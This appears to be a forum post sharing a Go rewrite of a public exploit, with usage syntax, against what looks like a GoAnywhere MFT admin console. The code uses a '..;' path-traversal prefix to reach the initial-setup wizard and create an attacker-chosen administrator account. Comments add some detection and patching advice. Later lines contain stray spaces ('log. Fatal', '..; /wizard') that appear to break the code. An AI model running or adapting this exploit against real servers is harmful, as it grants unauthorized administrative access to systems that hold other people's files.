I was having some issues with the public exploit, so I rewrote it in Go.
syntax:
go run rce.go http://1.2.3.4:8855 user pass
Password should be 8 char minimum
Code:
package main
import (
"crypto/tls"
"fmt"
"log"
"net/http"
"net/url"
"os"
"github.com/PuerkitoBio/goquery"
)
// main performs a two-request sequence against a web console's initial
// account-setup wizard: it fetches the wizard page, copies the JSF ViewState
// token out of the returned HTML, then submits the wizard's create-admin form
// with the username and password taken from the command line.
//
// NOTE(review): the /goanywhere/ path prefix suggests the target is a
// GoAnywhere MFT admin console. That is inferred from the URL only; the page
// names no advisory and no affected version.
//
// Defender view: both request paths place a "..;" segment ahead of
// /wizard/InitialAccountSetup.xhtml. Access-log or reverse-proxy entries with
// "..;" in the path, any hit on the setup wizard of an instance that has
// already been set up, and administrator accounts nobody provisioned are the
// observable traces of this sequence. Presumably the wizard is meant to be
// unreachable after installation; confirm against the vendor's guidance, apply
// the vendor's fix, and keep the admin console off untrusted networks.
func main() {
// Positional arguments are read without a length check; running with fewer
// than three panics with an index-out-of-range error.
endpoint := os.Args[1]
username := os.Args[2]
password := os.Args[3]
// Certificate verification is disabled, so the client accepts whatever TLS
// certificate the server presents.
client := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
// First request: GET the wizard page through the "images/..;" path prefix.
resp, err := client.Get(fmt.Sprintf("%s/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml", endpoint))
if err != nil {
log.Fatal(err)
}
// log.Fatal exits the process, so this deferred Close only runs when main
// returns normally.
defer resp.Body.Close()
doc, err := goquery.NewDocumentFromReader(resp.Body)
if err != nil {
log.Fatal(err)
}
// The hidden javax.faces.ViewState input is copied into the form below.
// AttrOr falls back to "" when the input is absent, and that empty value is
// still submitted; the GET's status code is never checked.
viewState := doc.Find("input[name=javax.faces.ViewState]").AttrOr("value", "")
// Form fields for the create-admin submission. The visible password inputs
// carry a run of bullet characters (U+2022); the supplied password travels in
// the *_hinput fields.
data := map[string]string{
"j_id_u:creteAdminGrid:username": username,
"j_id_u:creteAdminGrid:password_hinput": password,
"j_id_u:creteAdminGrid:password": "\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022",
"j_id_u:creteAdminGrid:confirmPassword_hinput": password,
"j_id_u:creteAdminGrid:confirmPassword": "\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022",
"j_id_u:creteAdminGrid:submitButton": "",
"createAdminForm_SUBMIT": "1",
"javax.faces.ViewState": viewState,
}
// Copy the map into url.Values so PostForm can encode it as a form body.
dataValues := url. Values{}
for key, value := range data {
dataValues.Add(key, value)
}
// Second request: POST the form to the wizard page.
resp, err = client. PostForm(fmt. Sprintf("%s/goanywhere/images/..; /wizard/InitialAccountSetup.xhtml", endpoint), dataValues)
if err != nil {
log. Fatal(err)
}
defer resp. Body.Close()
// Any status other than 200 is reported as a failure.
if resp. StatusCode != 200 {
log. Fatal("Failed to create new admin user")
}
doc, err = goquery. NewDocumentFromReader(resp. Body)
if err != nil {
log. Fatal(err)
}
// A non-empty span.ui-messages-error-summary in the response is printed as
// the failure reason; a 200 response without that text is treated as success.
errorMessage := doc. Find("span.ui-messages-error-summary"). Text()
if errorMessage != "" {
log. Fatal(errorMessage)
}
fmt. Println("New admin user created successfully")
}
syntax:
go run rce.go http://1.2.3.4:8855 user pass
Password should be 8 char minimum